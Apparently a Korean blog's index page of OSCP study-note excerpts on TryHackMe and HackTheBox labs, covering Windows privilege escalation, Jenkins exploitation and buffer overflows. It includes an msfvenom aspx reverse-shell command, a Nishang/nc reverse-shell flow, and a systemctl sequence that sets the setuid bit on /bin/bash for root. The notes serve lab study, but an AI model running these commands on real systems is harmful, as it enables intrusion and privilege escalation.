exploit 8

[Windows] Windows PrivEsc Arena

Windows PrivEsc Arena tryhackme.com/room/windowsprivescarena - 원인에 대한 분석이나 구체적 설명이 없음... - 정말 실습용, 나중에 winPEAS 결과물 보고 참고하는 것이 좋을 듯 Registry Escalation - Autorun Registry Escalation - AlwaysInstallElevated Service Escalation - Registry Privilege Escalation - Startup Applications Service Escalation - DLL Hijacking Service Escalation - binPath Service Escalation - Unquoted Service Paths Potato Esca..

OSCP/TryHackMe 2020.06.14

[Windows] Devel

Devel * 웹에서 venom 쉘이 실행되도록 was가 실행가능한 포멧으로 페이로드를 생성하여 업로드. Armed with the ability to upload files, it is possible to drop an aspx reverse shell on the target and execute it by browsing to the file via the web server. The following command will create the aspx file: msfvenom -p windows/meterpreter/reverse_tcp LHOST=호스트 LPORT=포트 -f aspx > devel.aspx 다음과 같이 curl을 사용하여 콘솔에서 트리거 할 수 있음 curl -g 10.10...

OSCP/HackTheBox 2020.05.19

버퍼오버플로우

2020/07/15 - TryHackme gatekeeper.exe - 퍼징을 테스트할 때, 마지막에 라인피드 문자열이 필요하다. 문자열 끝에 라인피드, \r\n를 붙여주지 않으면 서버측에서는 아직 클라이언트의 데이터 송신이 끝나지 않았다고 판단하여 계속 대기하게 된다. (이것은 프로그램마다 다르다, 라인피드가 없어도 자체적으로 붙여서 처리하도록 구현된 프로그램도 있다.) - EXITFUNC=thread 같은 옵션은 기본 익스플로잇부터 먼저 성공시키고 여유가 있을때 추가하도록한다. (옵션 붙이면 안되는 APP도 존재) - 버퍼오버플로우 트리거 이후 쉘 스페이스가 충분하지 않기 때문에 한번 더 생각해보아야 하는 문제 - 쉘을 페이로드 어디에 위치 시킬 것이며 어떻게 EIP를 컨트롤하여 트리거 할 것인가? ..

OSCP/시험대비 2020.05.04

[Windows] Alfred

Alfred Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. 잰킨스 Exploit 잰킨스는 project 옵션 -> configure -> build -> windows batch command 를 통해 쉘을 설정하고 build now를 클릭하여 원하는 명령을 실행할 수 있었다. 이를 이용해 잰킨스 관리자 계정을 알고있으면 시스템의 리버스 쉘을 획득할 수있다. 공격 Flow 1. Nishang 파워 쉘 다운 후 바로 nc로 리버스 연결 2. 미터프리터로 쉘 스위치 (권한상승을 더 쉽게 하기 위함) - venom으로 생성 후 다시 잰킨스에서 리버스..

OSCP/TryHackMe 2020.04.16

Systemctl

https://gtfobins.github.io/gtfobins/systemctl/ 1. systemctl 경로를 환경에 맞게 수정 2. bash 권한에 스티키 비트 추가 구문 수정 TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF 위 명령 실행 후.. 스티키비트 생성 확인 $ ls -l /bin/bash 루트 권한 확인 $ /bin/bash -p -p: posix모드..? $ id

11. Privilege Escalation

11. - Privilege Escalation 권한 상승은 기계 또는 네트워크에 대한 접근의 수준을 높이는 과정이다. 대부분의 운영 체제 및 기타 작업 환경에서는 사용자 권한 분리 모델을 준수하기 위해 권한 상승 프로세스가 본질적으로 방지된다. 그러므로, 정의에 따르면, 권한 상승 과정은 이 보안 모델을 깨는 것을 포함할 것이다. 11.1 - 권한 상승 공격 권한상승 표현은 까다로운 것이다. 정의상 대부분의 Exploit은 이 범주에 속한다. 만약 그것들이 작동한다면, 그것들은 기존의 취약성을 성공적으로 이용함으로써 당신의 권한을 어떤 식으로든 타겟 머신에 올릴 것이다. 그러나, 권한상승 이용이라는 용어는 대개 피해자의 기계에서 로컬로 실행되는, 일반적으로 더 높은 특권을 가진 프로세스나 서비스를 이용..

7. Win32 Buffer Overflow Exploitation

버퍼오버플로우 퍼징 배울건데 대상은 SLMail 5.5.0 Mail Server 2005년에 취약점이 발견됬음 유저 로그인에 제공되는 POP3 PASS 명령어에 의해 영향 받음 공격자는 계정정보를 알필요 없이 버퍼오버플로우를 트리거 할 수 있음 SLMail은 DEP와 ASLR이 적용되어있지 않으므로 배우기 간단함 SLMail을 택한 이유중 하나는 간단한 커뮤니케이션, 평문 POP3 프로토콜을 사용하고 있기 때문이다. 우리는 초반에 pop3서버에 접근해봤어 netcat을 사용해서.. 만약 프로토콜이 알려져있지 않았다면 우리는 프로토콜 포멧은 RFC를 찾아봐야한다. 우리 스스로 와이어샤크를 이용해서 배워야한다. 파이썬으로 netcat연결 수행을 다시 재현해보면 다음 코드는 아래와 같다 #!/usr/bin/p..